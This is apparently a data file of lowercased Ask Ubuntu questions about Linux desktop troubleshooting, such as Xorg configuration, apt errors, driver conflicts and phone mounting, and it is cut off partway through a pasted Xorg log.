19.07 600 632 704 736 986 1009 1013 1036 modeline `` 1024x562 @ 25 '' 17.03 1024 1056 1120 1152 562 575 578 591 modeline `` 536x922 @ 25 '' 16.01 536 568 624 656 922 943 947 969 modeline `` 960x498 @ 25 '' 14.09 960 992 1040 1072 498 509 511 523 modeline `` 600x762 @ 25 '' 14.39 600 632 680 712 762 779 783 801 modeline `` 800x562 @ 25 '' 13.52 800 832 880 912 562 575 578 591 modeline `` 480x810 @ 25 '' 12.59 480 512 552 584 810 828 832 851 modeline `` 848x442 @ 25 '' 11.09 848 880 920 952 442 452 454 465 modeline `` 480x762 @ 25 '' 11.79 480 512 552 584 762 779 783 801 modeline `` 800x442 @ 25 '' 10.51 800 832 864 896 442 452 454 465 # 32px status bar ( no need for rounding ) : modeline `` 320x448 @ 50 '' 9.93 320 352 384 416 448 457 461 471 modeline `` 480x288 @ 50 '' 8.75 480 512 544 576 288 294 297 303 # 24px status bar : modeline `` 240x376 @ 50 '' 6.49 240 272 296 328 376 384 387 395 modeline `` 400x216 @ 50 '' 5.50 400 432 448 480 216 220 222 227 modeline `` 240x296 @ 50 '' 5.02 240 272 288 320 296 302 305 311 modeline `` 320x216 @ 50 '' 4.55 320 352 368 400 216 220 222 227 endsection section `` screen '' identifier `` screen0 '' device `` videocard0 '' monitor `` monitor0 '' defaultdepth 24 subsection `` display '' # tablet resolution virtual 1024 768 endsubsection endsection section `` serverlayout '' identifier `` dummy_layout '' screen 0 `` default screen '' screen 1 `` screen0 '' rightof `` default screen '' option `` xinerama '' `` 1 '' endsection and reboot the x server and next shloud be command : x11vnc -clip 1024x768+1280+0 but after reboot lightdm everything crushed , i have a black screen ( main monitor ) : ) and after that i need to recover my xorg.conf file . does anybody can explain me what could be wrong here ?
367914	give user access to passwd command	how to give permission for the new user account to have access to passwd command to allow this new user account to be able to change other account password ? i tried zxcvbnm all= nopasswd : /etc/passwd but do n't think my path name was correct . someone please help .
367917	unity web apps do n't have menu options or notifications	i 'm using firefox 24.0 on ubuntu 13.10 64-bit . i installed a couple of web apps ( twitter , youtube , gmail ) by surfing to the websites and by installing it via the pop up that appears however they are n't working properly because they do n't have `` menu actions '' ( or whatever you call them ) : when you right-click the application in the launcher you get a menu , but the only things i see are the application name and `` remove from launcher '' . and gmail and twitter do n't show up in the notifications . ( that little e-mail icon ) and do n't show me new emails or tweets . youtube does show up in the sound menu for some reason ... how can i fix this , if it 's even fixable , and if it 's not do other people have the same issue ?
367921	unable to update and install a package.. no success by changing the source list	i continuously get the following error when i run apt-get update . based on the replies on the similar posts , i tried altering the source list , but nothing changed ! e : some index files failed to download . they have been ignored , or old ones used instead . i also get e : unable to locate package when i want to install a package with apt-get install . any solution for resolving this issue ?
367922	what can cause `` missing package : header , problem with mergelist , the package lists or status file could not be parsed or opened '' errors ?	i write tests for my company 's application . one of these tests tries to upgrade the application from a previous version to a new version to make sure nothing breaks . when i am installing an old version of the application , some weird stuff starts to happen . sometimes everything goes okay , and nothing is wrong , other times when trying to install i get this message ( company app name censored ) : e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/xxx-amd64_packages e : the package lists or status file could not be parsed or opened . using the solutions provided in the questions similar to this one ( like this ) . do not help , and the problem keeps repeating itself once it happens the first time . this has led me to believe something is wrong on the apt server where the package is being created , but searching these errors yields no information on anything beyond the `` fix '' suggested in the question i linked , the only other source of information i could find also did not help ( here ) : so i am asking for information ; what is the actual problem ? what causes the problem ? what can fix the problem ? this is not a duplicate of : how do i fix a `` problem with mergelist '' or `` status file could not be parsed '' error when trying to do an update ? i am trying to find the root cause of the problem to prevent that error from occurring . edit : thanks to this great answer by florian diesch i was able to solve my problem . by tracing back the reason to being an actual malformation in the package , i then started trying to find out why it was malformed . the reason was that as part of our vigorous testing , i was doing many simultaneous operations , and it seems the file was being written into twice which was causing it sometimes to have bad sections .
367927	how to connect nokia lumia 520 to ubuntu 12.04	i have done the following steps : sudo add-apt-repository ppa : langdalepl/gvfs-mtp sudo apt-get update and updated some packages from update manager . after doing above steps i am able to see lumia phone name in file system . but when i try to mount device i am getting following errors : unable to mount rm-914|nokia lumia 520 unable to open mtp device ' [ usb:001,010 ] ' is there any way to solve these problem ?
367931	tn5250 wo n't install , needs libssl0.9.6 but libssl0.9.8 is installed	i 'm trying to install a 5250 emulator so i downloaded the debian version of tn5250 from source forge , when i try to install it i was missing libssl0.9.6 so i went to get it and libssl0.9.8 came up instead so i installed that but tn5250 is still wanting libssl0.9.6 . i tried rebooting and retrying tn5250 , no luck .
367933	can not find skype in ubuntu software center	i am in need of skype but , when i upgraded my system to ubuntu , i found that the skype is not available in ubuntu software center . even if i download the package from the skype the ubuntu software center does not allow to install it . its too bad that ubuntu does not support very popular software skype .
367934	problem importing firefox bookmarks to chromium	i would like to switch from firefox to chromium ( it seems to be faster for my system ) and i have a large number of bookmarks i would like to import into chromium . i looked at this question : can i sync bookmarks between firefox and chromium ? but that seemed to be specific to firefox sync , which i do n't have . i just want to import my bookmarks from firefox into chromium . however , when i go to the customize and control button and then choose the option import bookmarks and settings under the bookmarks menu item , it gives me this : i have firefox and chromium as up to date as the official repositories ( i believe ) , so i really have no clue what is going on . i have attempted to import directly from html , but it only imports the first set of bookmarks , nothing beyond that ( where all of the bookmarks i really want are . ) can i import the json firefox backup file into chromium , or am i stuck manually entering all of these bookmarks into chromium ? thanks ! edit : 10/30/2013 i 'm going to attempt sudo apt-get upgrade to see if this does anything . edit : later in 10/30/2013 nope . it only upgrade lightdm : the following packages will be upgraded : liblightdm-gobject-1-0 lightdm 2 upgraded , 0 newly installed , 0 to remove and 0 not upgraded edit : 10/31/2013 turns out i mis-read the ubuntu ppa . 13.04 , raring ringtail , only has 28.0 . apparently i am to be forced to upgrade if i want software upgrades . botheration . i guess i will do so when i can , but does anyone know if i can force an upgrade of only certain software ( chromium for example . )
367937	broadcom wifi drivers conflict	$ sudo dpkg -i wireless-bcm43142-dkms-6.20.55.19_amd64.deb dpkg : acerca de wireless-bcm43142-dkms-6.20.55.19_amd64.deb que contiene wireless-bcm43142-oneiric-dkms : wireless-bcm43142-oneiric-dkms entra en conflicto con bcmwl-kernel-source bcmwl-kernel-source ( versiรณn 6.20.155.1+bdcom-0ubuntu0.0.2 ) estรก presente y instalado . dpkg : error al procesar wireless-bcm43142-dkms-6.20.55.19_amd64.deb ( -- install ) : paquetes en conflicto - no se instalarรก wireless-bcm43142-oneiric-dkms se encontraron errores al procesar : wireless-bcm43142-dkms-6.20.55.19_amd64.deb help me find a solution to install this .deb package .
367942	dhcp fails to start	i just installed ubuntu 12.0.4 on an hp 8560 laptop . i installed fog version 29 and everything worked just fine except the dhcp3 package failed to start . when i run the install command it says dhcp3 is installed , but when i type in the following command to start dhcp ( sudo /etc/init.d/dhcp3-server start it says the command is not found . is there a different command for ubuntu 12 ? i have been using ubuntu 10 on my other fog servers and that command works fine.thank you for your help .
367944	how to download jdk for android programming	i 'm using ubuntu 12.04 64 bit . i 'm going to start programming for android devices . i know that i will need to install a jdk , but i do n't have access to oracle.com . how do i get it ?
367946	ubuntu builder and dependencies of software packages	i 'm trying to make custom ubuntu distro , and i will do that by using ubuntu builder . now , my question is : `` when i try to add some package to that distro from ubuntu builder , what happens with dependencies ? do i have to know what are dependencies of some .deb package and add them to the distro or ubuntu builder does that automaticaly ? '' than you in advance
367949	what is the linux version that best fits my system to install ?	i would like to ask if you can tell me , what is the linux version that best fits my system to install ? ! intel pentium 4 cpu 3.40ghz 1 gb ram nvidia 6600 pending your reply , thank you very much !
367954	graphic card from nvidia to intel in ubuntu12.04.3	recently i change my mainboard and my graphic card also change , from nvidia to intel , both integrate . but i do n't know how to do with my graphic driver . i try to install intel graphic driver from this . but it seems not support 12.04 no longer . how to switch to native driver in 12.04 ? or another advise ? this is my graphic card 's info : xsuii @ xsuii-unknow : ~ $ sudo lshw -c display *-display unclaimed description : vga compatible controller product : 2nd generation core processor family integrated graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 09 width : 64 bits clock : 33mhz capabilities : msi pm vga_controller cap_list configuration : latency=0 resources : memory : fe000000-fe3fffff memory : c0000000-cfffffff ioport : f000 ( size=64 ) thanks a lot if you can help me .
367957	ubuntu gnome 13.10 ca n't startx , amd drivers fail	i accidentally murdered my gnome installation when trying to install legacy proprietary amd drivers ( following exactly http : //ubuntuforums.org/showthread.php ? t=2181190 ) . when trying to use startx , i get that screen is not present . here 's my /var/log/xorg.0.log ( a big one ) [ 69.618 ] x.org x server 1.14.3 release date : 2013-09-12 [ 69.619 ] x protocol version 11 , revision 0 [ 69.619 ] build operating system : linux 3.2.0-37-generic x86_64 ubuntu [ 69.619 ] current operating system : linux heisenberg 3.11.0-12-generic # 19-ubuntu smp wed oct 9 16:20:46 utc 2013 x86_64 [ 69.619 ] kernel command line : boot_image=/vmlinuz-3.11.0-12-generic root=/dev/mapper/ubuntu -- gnome -- vg-root ro recovery nomodeset [ 69.619 ] build date : 15 october 2013 09:23:37am [ 69.619 ] xorg-server 2:1.14.3-3ubuntu2 ( for technical support please see http : //www.ubuntu.com/support ) [ 69.619 ] current version of pixman : 0.30.2 [ 69.620 ] before reporting problems , check http : //wiki.x.org to make sure that you have the latest version . [ 69.620 ] markers : ( -- ) probed , ( ** ) from config file , ( == ) default setting , ( ++ ) from command line , ( ! ! ) notice , ( ii ) informational , ( ww ) warning , ( ee ) error , ( ni ) not implemented , ( ? ? ) unknown . [ 69.621 ] ( == ) log file : `` /var/log/xorg.0.log '' , time : tue oct 29 16:55:38 2013 [ 69.621 ] ( == ) using system config directory `` /usr/share/x11/xorg.conf.d '' [ 69.621 ] ( == ) no layout section . using the first screen section . [ 69.621 ] ( == ) no screen section available . using defaults . [ 69.621 ] ( ** ) | -- > screen `` default screen section '' ( 0 ) [ 69.621 ] ( ** ) | | -- > monitor `` < default monitor > '' [ 69.621 ] ( == ) no monitor specified for screen `` default screen section '' . using a default monitor configuration . [ 69.621 ] ( == ) automatically adding devices [ 69.621 ] ( == ) automatically enabling devices [ 69.621 ] ( == ) automatically adding gpu devices [ 69.621 ] ( ww ) the directory `` /usr/share/fonts/x11/cyrillic '' does not exist . [ 69.621 ] entry deleted from font path . [ 69.621 ] ( ww ) the directory `` /usr/share/fonts/x11/100dpi/ '' does not exist . [ 69.621 ] entry deleted from font path . [ 69.621 ] ( ww ) the directory `` /usr/share/fonts/x11/75dpi/ '' does not exist . [ 69.621 ] entry deleted from font path . [ 69.621 ] ( ww ) the directory `` /usr/share/fonts/x11/100dpi '' does not exist . [ 69.621 ] entry deleted from font path . [ 69.621 ] ( ww ) the directory `` /usr/share/fonts/x11/75dpi '' does not exist . [ 69.621 ] entry deleted from font path . [ 69.621 ] ( == ) fontpath set to : /usr/share/fonts/x11/misc , /usr/share/fonts/x11/type1 , built-ins [ 69.621 ] ( == ) modulepath set to `` /usr/lib/x86_64-linux-gnu/xorg/extra-modules , /usr/lib/xorg/extra-modules , /usr/lib/xorg/modules '' [ 69.621 ] ( ii ) the server relies on udev to provide the list of input devices . if no devices become available , reconfigure udev or disable autoadddevices . [ 69.621 ] ( ii ) loader magic : 0x7fc2734ddd20 [ 69.621 ] ( ii ) module abi versions : [ 69.621 ] x.org ansi c emulation : 0.4 [ 69.621 ] x.org video driver : 14.1 [ 69.621 ] x.org xinput driver : 19.1 [ 69.621 ] x.org server extension : 7.0 [ 69.623 ] ( -- ) pci : * ( 0:1:0:0 ) 1002:9552:103c:3074 rev 0 , mem @ 0xc0000000/268435456 , 0xd8400000/65536 , i/o @ 0x00007000/256 , bios @ 0x ? ? ? ? ? ? ? ? /131072 [ 69.623 ] ( ii ) open acpi successful ( /var/run/acpid.socket ) [ 69.623 ] initializing built-in extension generic event extension [ 69.623 ] initializing built-in extension shape [ 69.624 ] initializing built-in extension mit-shm [ 69.624 ] initializing built-in extension xinputextension [ 69.624 ] initializing built-in extension xtest [ 69.624 ] initializing built-in extension big-requests [ 69.624 ] initializing built-in extension sync [ 69.624 ] initializing built-in extension xkeyboard [ 69.624 ] initializing built-in extension xc-misc [ 69.624 ] initializing built-in extension security [ 69.624 ] initializing built-in extension xinerama [ 69.624 ] initializing built-in extension xfixes [ 69.625 ] initializing built-in extension render [ 69.625 ] initializing built-in extension randr [ 69.625 ] initializing built-in extension composite [ 69.625 ] initializing built-in extension damage [ 69.625 ] initializing built-in extension mit-screen-saver [ 69.625 ] initializing built-in extension double-buffer [ 69.625 ] initializing built-in extension record [ 69.625 ] initializing built-in extension dpms [ 69.625 ] initializing built-in extension x-resource [ 69.625 ] initializing built-in extension xvideo [ 69.626 ] initializing built-in extension xvideo-motioncompensation [ 69.626 ] initializing built-in extension selinux [ 69.626 ] initializing built-in extension xfree86-vidmodeextension [ 69.626 ] initializing built-in extension xfree86-dga [ 69.626 ] initializing built-in extension xfree86-dri [ 69.626 ] initializing built-in extension dri2 [ 69.626 ] ( ii ) `` glx '' will be loaded by default . [ 69.626 ] ( ww ) `` xmir '' is not to be loaded by default . skipping . [ 69.626 ] ( ii ) loadmodule : `` dri2 '' [ 69.626 ] ( ii ) module `` dri2 '' already built-in [ 69.626 ] ( ii ) loadmodule : `` glamoregl '' [ 69.627 ] ( ii ) loading /usr/lib/xorg/modules/libglamoregl.so [ 69.628 ] ( ee ) failed to load /usr/lib/xorg/modules/libglamoregl.so : /usr/lib/xorg/modules/libglamoregl.so : undefined symbol : _glapi_tls_context [ 69.628 ] ( ii ) unloadmodule : `` glamoregl '' [ 69.628 ] ( ii ) unloading glamoregl [ 69.628 ] ( ee ) failed to load module `` glamoregl '' ( loader failed , 7 ) [ 69.628 ] ( ii ) loadmodule : `` glx '' [ 69.628 ] ( ii ) loading /usr/lib/x86_64-linux-gnu/xorg/extra-modules/extra-modules.dpkg-tmp/modules/extensions/libglx.so [ 69.628 ] ( ii ) module glx : vendor= '' advanced micro devices , inc. '' [ 69.628 ] compiled for 6.9.0 , module version = 1.0.0 [ 69.629 ] loading extension glx [ 69.629 ] ( == ) matched fglrx as autoconfigured driver 0 [ 69.629 ] ( == ) matched ati as autoconfigured driver 1 [ 69.629 ] ( == ) matched vesa as autoconfigured driver 2 [ 69.629 ] ( == ) matched modesetting as autoconfigured driver 3 [ 69.629 ] ( == ) matched fbdev as autoconfigured driver 4 [ 69.629 ] ( == ) assigned the driver to the xf86configlayout [ 69.629 ] ( ii ) loadmodule : `` fglrx '' [ 69.629 ] ( ii ) loading /usr/lib/x86_64-linux-gnu/xorg/extra-modules/extra-modules.dpkg-tmp/modules/drivers/fglrx_drv.so [ 69.646 ] ( ee ) failed to load /usr/lib/x86_64-linux-gnu/xorg/extra-modules/extra-modules.dpkg-tmp/modules/drivers/fglrx_drv.so : /usr/lib/x86_64-linux-gnu/xorg/extra-modules/extra-modules.dpkg-tmp/modules/drivers/fglrx_drv.so : undefined symbol : noxfree86driextension [ 69.646 ] ( ii ) unloadmodule : `` fglrx '' [ 69.646 ] ( ii ) unloading fglrx [ 69.646 ] ( ee ) failed to load module `` fglrx '' ( loader failed , 7 ) [ 69.646 ] ( ii ) loadmodule : `` ati '' [ 69.647 ] ( ii ) loading /usr/lib/xorg/modules/drivers/ati_drv.so [ 69.647 ] ( ii ) module ati : vendor= '' x.org foundation '' [ 69.647 ] compiled for 1.14.3 , module version = 7.2.0 [ 69.647 ] module class : x.org video driver [ 69.647 ] abi class : x.org video driver , version 14.1 [ 69.647 ] ( ii ) loadmodule : `` radeon '' [ 69.647 ] ( ii ) loading /usr/lib/xorg/modules/drivers/radeon_drv.so [ 69.648 ] ( ii ) module radeon : vendor= '' x.org foundation '' [ 69.648 ] compiled for 1.14.3 , module version = 7.2.0 [ 69.648 ] module class : x.org video driver [ 69.648 ] abi class : x.org video driver , version 14.1 [ 69.648 ] ( ii ) loadmodule : `` vesa '' [ 69.649 ] ( ii ) loading /usr/lib/xorg/modules/drivers/vesa_drv.so [ 69.649 ] ( ii ) module vesa : vendor= '' x.org foundation '' [ 69.649 ] compiled for 1.14.1 , module version = 2.3.2 [ 69.649 ] module class : x.org video driver [ 69.649 ] abi class : x.org video driver , version 14.1 [ 69.649 ] ( ii ) loadmodule : `` modesetting '' [ 69.649 ] ( ii ) loading /usr/lib/xorg/modules/drivers/modesetting_drv.so [ 69.649 ] ( ii ) module modesetting : vendor= '' x.org foundation '' [ 69.649 ] compiled for 1.14.1 , module version = 0.8.0 [ 69.649 ] module class : x.org video driver [ 69.649 ] abi class : x.org video driver , version 14.1 [ 69.649 ] ( ii ) loadmodule : `` fbdev '' [ 69.650 ] ( ii ) loading /usr/lib/xorg/modules/drivers/fbdev_drv.so [ 69.650 ] ( ii ) module fbdev : vendor= '' x.org foundation '' [ 69.650 ] compiled for 1.14.1 , module version = 0.4.3 [ 69.650 ] module class : x.org video driver [ 69.650 ] abi class : x.org video driver , version 14.1 [ 69.650 ] ( == ) matched fglrx as autoconfigured driver 0 [ 69.650 ] ( == ) matched ati as autoconfigured driver 1 [ 69.650 ] ( == ) matched vesa as autoconfigured driver 2 [ 69.650 ] ( == ) matched modesetting as autoconfigured driver 3 [ 69.650 ] ( == ) matched fbdev as autoconfigured driver 4 [ 69.650 ] ( == ) assigned the driver to the xf86configlayout [ 69.650 ] ( ii ) loadmodule : `` fglrx '' [ 69.650 ] ( ii ) loading /usr/lib/x86_64-linux-gnu/xorg/extra-modules/extra-modules.dpkg-tmp/modules/drivers/fglrx_drv.so [ 69.675 ] ( ee ) failed to load /usr/lib/x86_64-linux-gnu/xorg/extra-modules/extra-modules.dpkg-tmp/modules/drivers/fglrx_drv.so : /usr/lib/x86_64-linux-gnu/xorg/extra-modules/extra-modules.dpkg-tmp/modules/drivers/fglrx_drv.so : undefined symbol : noxfree86driextension [ 69.675 ] ( ii ) unloadmodule : `` fglrx '' [ 69.675 ] ( ii ) unloading fglrx [ 69.675 ] ( ee ) failed to load module `` fglrx '' ( loader failed , 7 ) [ 69.675 ] ( ii ) loadmodule : `` ati '' [ 69.675 ] ( ii ) loading /usr/lib/xorg/modules/drivers/ati_drv.so [ 69.675 ] ( ii ) module ati : vendor= '' x.org foundation '' [ 69.676 ] compiled for 1.14.3 , module version = 7.2.0 [ 69.676 ] module class : x.org video driver [ 69.676 ] abi class : x.org video driver , version 14.1 [ 69.676 ] ( ii ) loadmodule : `` vesa '' [ 69.676 ] ( ii ) loading /usr/lib/xorg/modules/drivers/vesa_drv.so [ 69.676 ] ( ii ) module vesa : vendor= '' x.org foundation '' [ 69.676 ] compiled for 1.14.1 , module version = 2.3.2 [ 69.676 ] module class : x.org video driver [ 69.676 ] abi class : x.org video driver , version 14.1 [ 69.676 ] ( ii ) unloadmodule : `` vesa '' [ 69.676 ] ( ii ) unloading vesa [ 69.676 ] ( ii ) failed to load module `` vesa '' ( already loaded , 7 ) [ 69.676 ] ( ii ) loadmodule : `` modesetting '' [ 69.676 ] ( ii ) loading /usr/lib/xorg/modules/drivers/modesetting_drv.so [ 69.676 ] ( ii ) module modesetting : vendor= '' x.org foundation '' [ 69.676 ] compiled for 1.14.1 , module version = 0.8.0 [ 69.676 ] module class : x.org video driver [ 69.676 ] abi class : x.org video driver , version 14.1 [ 69.676 ] ( ii ) unloadmodule : `` modesetting '' [ 69.676 ] ( ii ) unloading modesetting [ 69.676 ] ( ii ) failed to load module `` modesetting '' ( already loaded , 7 ) [ 69.676 ] ( ii ) loadmodule : `` fbdev '' [ 69.677 ] ( ii ) loading /usr/lib/xorg/modules/drivers/fbdev_drv.so [ 69.677 ] ( ii ) module fbdev : vendor= '' x.org foundation '' [ 69.677 ] compiled for 1.14.1 , module version = 0.4.3 [ 69.677 ] module class : x.org video driver [ 69.677 ] abi class : x.org video driver , version 14.1 [ 69.677 ] ( ii ) unloadmodule : `` fbdev '' [ 69.677 ] ( ii ) unloading fbdev [ 69.677 ] ( ii ) failed to load module `` fbdev '' ( already loaded , 7 ) [ 69.677 ] ( ii ) radeon : driver for ati radeon chipsets : ati radeon mobility x600 ( m24 ) 3150 ( pcie ) , ati firemv 2400 ( pci ) , ati radeon mobility x300 ( m24 ) 3152 ( pcie ) , ati firegl m24 gl 3154 ( pcie ) , ati firemv 2400 3155 ( pci ) , ati radeon x600 ( rv380 ) 3e50 ( pcie ) , ati firegl v3200 ( rv380 ) 3e54 ( pcie ) , ati radeon igp320 ( a3 ) 4136 , ati radeon igp330/340/350 ( a4 ) 4137 , ati radeon 9500 ad ( agp ) , ati radeon 9500 ae ( agp ) , ati radeon 9600tx af ( agp ) , ati firegl z1 ag ( agp ) , ati radeon 9800se ah ( agp ) , ati radeon 9800 ai ( agp ) , ati radeon 9800 aj ( agp ) , ati firegl x2 ak ( agp ) , ati radeon 9600 ap ( agp ) , ati radeon 9600se aq ( agp ) , ati radeon 9600xt ar ( agp ) , ati radeon 9600 as ( agp ) , ati firegl t2 at ( agp ) , ati radeon 9650 , ati firegl rv360 av ( agp ) , ati radeon 7000 igp ( a4+ ) 4237 , ati radeon 8500 aiw bb ( agp ) , ati radeon igp320m ( u1 ) 4336 , ati radeon igp330m/340m/350m ( u2 ) 4337 , ati radeon mobility 7000 igp 4437 , ati radeon 9000/pro if ( agp/pci ) , ati radeon 9000 ig ( agp/pci ) , ati radeon x800 ( r420 ) jh ( agp ) , ati radeon x800pro ( r420 ) ji ( agp ) , ati radeon x800se ( r420 ) jj ( agp ) , ati radeon x800 ( r420 ) jk ( agp ) , ati radeon x800 ( r420 ) jl ( agp ) , ati firegl x3 ( r420 ) jm ( agp ) , ati radeon mobility 9800 ( m18 ) jn ( agp ) , ati radeon x800 se ( r420 ) ( agp ) , ati radeon x800xt ( r420 ) jp ( agp ) , ati radeon x800 ve ( r420 ) jt ( agp ) , ati radeon x850 ( r480 ) ( agp ) , ati radeon x850 xt ( r480 ) ( agp ) , ati radeon x850 se ( r480 ) ( agp ) , ati radeon x850 pro ( r480 ) ( agp ) , ati radeon x850 xt pe ( r480 ) ( agp ) , ati radeon mobility m7 lw ( agp ) , ati mobility firegl 7800 m7 lx ( agp ) , ati radeon mobility m6 ly ( agp ) , ati radeon mobility m6 lz ( agp ) , ati firegl mobility 9000 ( m9 ) ld ( agp ) , ati radeon mobility 9000 ( m9 ) lf ( agp ) , ati radeon mobility 9000 ( m9 ) lg ( agp ) , ati firemv 2400 pci , ati radeon 9700 pro nd ( agp ) , ati radeon 9700/9500pro ne ( agp ) , ati radeon 9600tx nf ( agp ) , ati firegl x1 ng ( agp ) , ati radeon 9800pro nh ( agp ) , ati radeon 9800 ni ( agp ) , ati firegl x2 nk ( agp ) , ati radeon 9800xt nj ( agp ) , ati radeon mobility 9600/9700 ( m10/m11 ) np ( agp ) , ati radeon mobility 9600 ( m10 ) nq ( agp ) , ati radeon mobility 9600 ( m11 ) nr ( agp ) , ati radeon mobility 9600 ( m10 ) ns ( agp ) , ati firegl mobility t2 ( m10 ) nt ( agp ) , ati firegl mobility t2e ( m11 ) nv ( agp ) , ati radeon qd ( agp ) , ati radeon qe ( agp ) , ati radeon qf ( agp ) , ati radeon qg ( agp ) , ati firegl 8700/8800 qh ( agp ) , ati radeon 8500 ql ( agp ) , ati radeon 9100 qm ( agp ) , ati radeon 7500 qw ( agp/pci ) , ati radeon 7500 qx ( agp/pci ) , ati radeon ve/7000 qy ( agp/pci ) , ati radeon ve/7000 qz ( agp/pci ) , ati es1000 515e ( pci ) , ati radeon mobility x300 ( m22 ) 5460 ( pcie ) , ati radeon mobility x600 se ( m24c ) 5462 ( pcie ) , ati firegl m22 gl 5464 ( pcie ) , ati radeon x800 ( r423 ) uh ( pcie ) , ati radeon x800pro ( r423 ) ui ( pcie ) , ati radeon x800le ( r423 ) uj ( pcie ) , ati radeon x800se ( r423 ) uk ( pcie ) , ati radeon x800 xtp ( r430 ) ( pcie ) , ati radeon x800 xl ( r430 ) ( pcie ) , ati radeon x800 se ( r430 ) ( pcie ) , ati radeon x800 ( r430 ) ( pcie ) , ati firegl v7100 ( r423 ) ( pcie ) , ati firegl v5100 ( r423 ) uq ( pcie ) , ati firegl unknown ( r423 ) ur ( pcie ) , ati firegl unknown ( r423 ) ut ( pcie ) , ati mobility firegl v5000 ( m26 ) ( pcie ) , ati mobility firegl v5000 ( m26 ) ( pcie ) , ati mobility radeon x700 xl ( m26 ) ( pcie ) , ati mobility radeon x700 ( m26 ) ( pcie ) , ati mobility radeon x700 ( m26 ) ( pcie ) , ati radeon x550xtx 5657 ( pcie ) , ati radeon 9100 igp ( a5 ) 5834 , ati radeon mobility 9100 igp ( u3 ) 5835 , ati radeon xpress 200 5954 ( pcie ) , ati radeon xpress 200m 5955 ( pcie ) , ati radeon 9250 5960 ( agp ) , ati radeon 9200 5961 ( agp ) , ati radeon 9200 5962 ( agp ) , ati radeon 9200se 5964 ( agp ) , ati firemv 2200 ( pci ) , ati es1000 5969 ( pci ) , ati radeon xpress 200 5974 ( pcie ) , ati radeon xpress 200m 5975 ( pcie ) , ati radeon xpress 200 5a41 ( pcie ) , ati radeon xpress 200m 5a42 ( pcie ) , ati radeon xpress 200 5a61 ( pcie ) , ati radeon xpress 200m 5a62 ( pcie ) , ati radeon x300 ( rv370 ) 5b60 ( pcie ) , ati radeon x600 ( rv370 ) 5b62 ( pcie ) , ati radeon x550 ( rv370 ) 5b63 ( pcie ) , ati firegl v3100 ( rv370 ) 5b64 ( pcie ) , ati firemv 2200 pcie ( rv370 ) 5b65 ( pcie ) , ati radeon mobility 9200 ( m9+ ) 5c61 ( agp ) , ati radeon mobility 9200 ( m9+ ) 5c63 ( agp ) , ati mobility radeon x800 xt ( m28 ) ( pcie ) , ati mobility firegl v5100 ( m28 ) ( pcie ) , ati mobility radeon x800 ( m28 ) ( pcie ) , ati radeon x850 5d4c ( pcie ) , ati radeon x850 xt pe ( r480 ) ( pcie ) , ati radeon x850 se ( r480 ) ( pcie ) , ati radeon x850 pro ( r480 ) ( pcie ) , ati unknown radeon / firegl ( r480 ) 5d50 ( pcie ) , ati radeon x850 xt ( r480 ) ( pcie ) , ati radeon x800xt ( r423 ) 5d57 ( pcie ) , ati firegl v5000 ( rv410 ) ( pcie ) , ati radeon x700 xt ( rv410 ) ( pcie ) , ati radeon x700 pro ( rv410 ) ( pcie ) , ati radeon x700 se ( rv410 ) ( pcie ) , ati radeon x700 ( rv410 ) ( pcie ) , ati radeon x700 se ( rv410 ) ( pcie ) , ati radeon x1800 , ati mobility radeon x1800 xt , ati mobility radeon x1800 , ati mobility firegl v7200 , ati firegl v7200 , ati firegl v5300 , ati mobility firegl v7100 , ati radeon x1800 , ati radeon x1800 , ati radeon x1800 , ati radeon x1800 , ati radeon x1800 , ati firegl v7300 , ati firegl v7350 , ati radeon x1600 , ati rv505 , ati radeon x1300/x1550 , ati radeon x1550 , ati m54-gl , ati mobility radeon x1400 , ati radeon x1300/x1550 , ati radeon x1550 64-bit , ati mobility radeon x1300 , ati mobility radeon x1300 , ati mobility radeon x1300 , ati mobility radeon x1300 , ati radeon x1300 , ati radeon x1300 , ati rv505 , ati rv505 , ati firegl v3300 , ati firegl v3350 , ati radeon x1300 , ati radeon x1550 64-bit , ati radeon x1300/x1550 , ati radeon x1600 , ati radeon x1300/x1550 , ati mobility radeon x1450 , ati radeon x1300/x1550 , ati mobility radeon x2300 , ati mobility radeon x2300 , ati mobility radeon x1350 , ati mobility radeon x1350 , ati mobility radeon x1450 , ati radeon x1300 , ati radeon x1550 , ati mobility radeon x1350 , ati firemv 2250 , ati radeon x1550 64-bit , ati radeon x1600 , ati radeon x1650 , ati radeon x1600 , ati radeon x1600 , ati mobility firegl v5200 , ati mobility radeon x1600 , ati radeon x1650 , ati radeon x1650 , ati radeon x1600 , ati radeon x1300 xt/x1600 pro , ati firegl v3400 , ati mobility firegl v5250 , ati mobility radeon x1700 , ati mobility radeon x1700 xt , ati firegl v5200 , ati mobility radeon x1700 , ati radeon x2300hd , ati mobility radeon hd 2300 , ati mobility radeon hd 2300 , ati radeon x1950 , ati radeon x1900 , ati radeon x1950 , ati radeon x1900 , ati radeon x1900 , ati radeon x1900 , ati radeon x1900 , ati radeon x1900 , ati radeon x1900 , ati radeon x1900 , ati radeon x1900 , ati radeon x1900 , ati amd stream processor , ati radeon x1900 , ati radeon x1950 , ati rv560 , ati rv560 , ati mobility radeon x1900 , ati rv560 , ati radeon x1950 gt , ati rv570 , ati rv570 , ati firegl v7400 , ati rv560 , ati radeon x1650 , ati radeon x1650 , ati rv560 , ati radeon 9100 pro igp 7834 , ati radeon mobility 9200 igp 7835 , ati radeon x1200 , ati radeon x1200 , ati radeon x1200 , ati radeon x1200 , ati radeon x1200 , ati rs740 , ati rs740m , ati rs740 , ati rs740m , ati radeon hd 2900 xt , ati radeon hd 2900 xt , ati radeon hd 2900 xt , ati radeon hd 2900 pro , ati radeon hd 2900 gt , ati firegl v8650 , ati firegl v8600 , ati firegl v7600 , ati radeon 4800 series , ati radeon hd 4870 x2 , ati radeon 4800 series , ati radeon hd 4850 x2 , ati firepro v8750 ( firegl ) , ati firepro v7760 ( firegl ) , ati mobility radeon hd 4850 , ati mobility radeon hd 4850 x2 , ati radeon 4800 series , ati firepro rv770 , amd firestream 9270 , amd firestream 9250 , ati firepro v8700 ( firegl ) , ati mobility radeon hd 4870 , ati mobility radeon m98 , ati mobility radeon hd 4870 , ati radeon 4800 series , ati radeon 4800 series , ati firepro m7750 , ati m98 , ati m98 , ati m98 , ati mobility radeon hd 4650 , ati radeon rv730 ( agp ) , ati mobility radeon hd 4670 , ati firepro m5750 , ati mobility radeon hd 4670 , ati radeon rv730 ( agp ) , ati rv730xt [ radeon hd 4670 ] , ati radeon e4600 , ati radeon hd 4600 series , ati rv730 pro [ radeon hd 4650 ] , ati firepro v7750 ( firegl ) , ati firepro v5700 ( firegl 